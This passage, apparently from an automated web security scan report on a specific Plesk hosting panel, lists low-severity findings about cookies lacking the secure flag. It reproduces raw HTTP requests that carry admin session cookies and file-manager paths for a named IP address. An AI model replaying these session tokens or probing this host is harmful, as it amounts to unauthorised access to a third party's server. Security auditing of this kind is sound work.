P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:04:48 GMT
Connection: close
Content-Length: 60502

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.104. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/create-dir/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/create-dir/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/create-dir/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:15:39 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:15:39 GMT
Connection: close
Content-Length: 48907

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.105. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/edit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/edit/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/edit/?cmd=chdir&file=%2F HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:30:00 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=tools; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:30:00 GMT
Connection: close
Content-Length: 60069

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.106. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/permissions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/permissions/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/permissions/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:04:58 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:05:00 GMT
Connection: close
Content-Length: 19217

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.107. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/rename/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/rename/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/rename/?cmd=rename_dir&file=cgi-bin HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/?cmd=chdir&file=/%2F
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:04:57 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:04:57 GMT
Connection: close
Content-Length: 23911

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.108. https://50.22.21.242:8443/plesk/client@3/domain@2/hosting/file-manager/view/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/client@3/domain@2/hosting/file-manager/view/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@3/domain@2/hosting/file-manager/view/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; psaContext=customers

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:05:01 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=customers; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:05:01 GMT
Connection: close
Content-Length: 58944

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.109. https://50.22.21.242:8443/plesk/cp-access/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/cp-access/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/cp-access/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/redirect/pleskin/root/?dst=%2Fplesk%2Fcp-access%2F&src=%2Fsmb%2Fsettings%2Ftools&srcController=SettingsController
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; sessionslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:42:57 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:42:57 GMT
Connection: close
Content-Length: 19428

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.110. https://50.22.21.242:8443/plesk/custom-buttons/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/custom-buttons/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/custom-buttons/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; PLESKSESSID=2b487a11e38efdea41e954b30502b2e0; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:30:18 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:30:17 GMT
Connection: close
Content-Length: 19043

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.111. https://50.22.21.242:8443/plesk/ftp-sessions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/ftp-sessions/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/ftp-sessions/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/sessions/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=ouhymmzgtdaqakoglnanbrbl; health-group-992a0f0542384f1ee5ef51b7cf4ae6c4-expanded=true; health-parameter-390627d9c1bc7dec0df1e293937015fd-chart=show; filelist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:26:25 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:26:26 GMT
Connection: close
Content-Length: 20734

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.112. https://50.22.21.242:8443/plesk/logo/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/logo/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/logo/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/redirect/pleskin/root/?dst=%2Fplesk%2Flogo%2F&src=%2Fsmb%2Fsettings%2Ftools&srcController=SettingsController
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; PLESKSESSID=2b487a11e38efdea41e954b30502b2e0; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:46:56 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:46:57 GMT
Connection: close
Content-Length: 16757

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.113. https://50.22.21.242:8443/plesk/notification@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/notification@/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/notification@/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/settings/tools
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:21:33 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:21:33 GMT
Content-Length: 30870

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.114. https://50.22.21.242:8443/plesk/server/components/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/server/components/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/server/components/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/smb/redirect/pleskin/root/?dst=%2Fplesk%2Fserver%2Fcomponents%2F&src=%2Fsmb%2Fsettings%2Ftools&srcController=SettingsController
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; locale=en-US; certificateslist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOiIiLCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; domaintrafficlist=eyJmbGFncyI6MCwic29ydCI6Im5hbWUiLCJmaWx0ZXIiOnsibmFtZSI6ImpwZyJ9LCJwYWdlIjowLCJwYWdlU2l6ZSI6MjV9; panelMoreResources-hidden=0; PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; sessionID=xvrjftqfoptegfsokqpykqdf; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 00:26:02 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 00:26:02 GMT
Connection: close
Content-Length: 29747

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.115. https://50.22.21.242:8443/plesk/server/google-tools/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/server/google-tools/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/server/google-tools/ HTTP/1.1
Host: 50.22.21.242:8443
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://50.22.21.242:8443/smb/admin-home
Cookie: PLESKSESSID=1450e76d9ec52ebae3d79068545d2c2f; locale=en-US; sessionID=ouhymmzgtdaqakoglnanbrbl

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 20 Nov 2011 01:56:09 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 20 Nov 2011 01:56:09 GMT
Content-Length: 17842

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.116. https://50.22.21.242:8443/plesk/server/interface/locale@/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://50.22.21.242:8443
Path:   /plesk/server/interface/locale@/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/server/interface/locale@/ HTTP/1.1
Host: 50.22.21.242:8443
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: https://50.22.21.242:8443/plesk/server/interface/uimodes@/
Cookie: no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; psaContext=dashboard; backuplocalrepositorylist=eyJmbGFncyI6MCwic29ydCI6ImRhdGVfcmV2ZXJzZSIsImZpbHRlciI6IiIsInBhZ2UiOjAsInBhZ2VTaXplIjoyNX0%3D; advancedPanel-hidden=0; phpMyAdmin=deleted; PLESKSESSID=2b487a11e38efdea41e954b30502b2e0; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 19 Nov 2011 22:47:45 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sat, 19 Nov 2011 22:47:45 GMT
Connection: close
Content-Length: 39855

<!DOCTYPE html><!--[if lt IE 7 ]><html class="ie ie6 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 7 ]><html class="ie ie7 lte9 lte8 lte7" lang="en"><![endif]-->
<!--[if IE 8 ]><html class="ie i
...[SNIP]...

4.117. https://50.22.21.242:8443/plesk/server/interface/locale@multi/disable/  previous  next

Summary

Severity:   Information
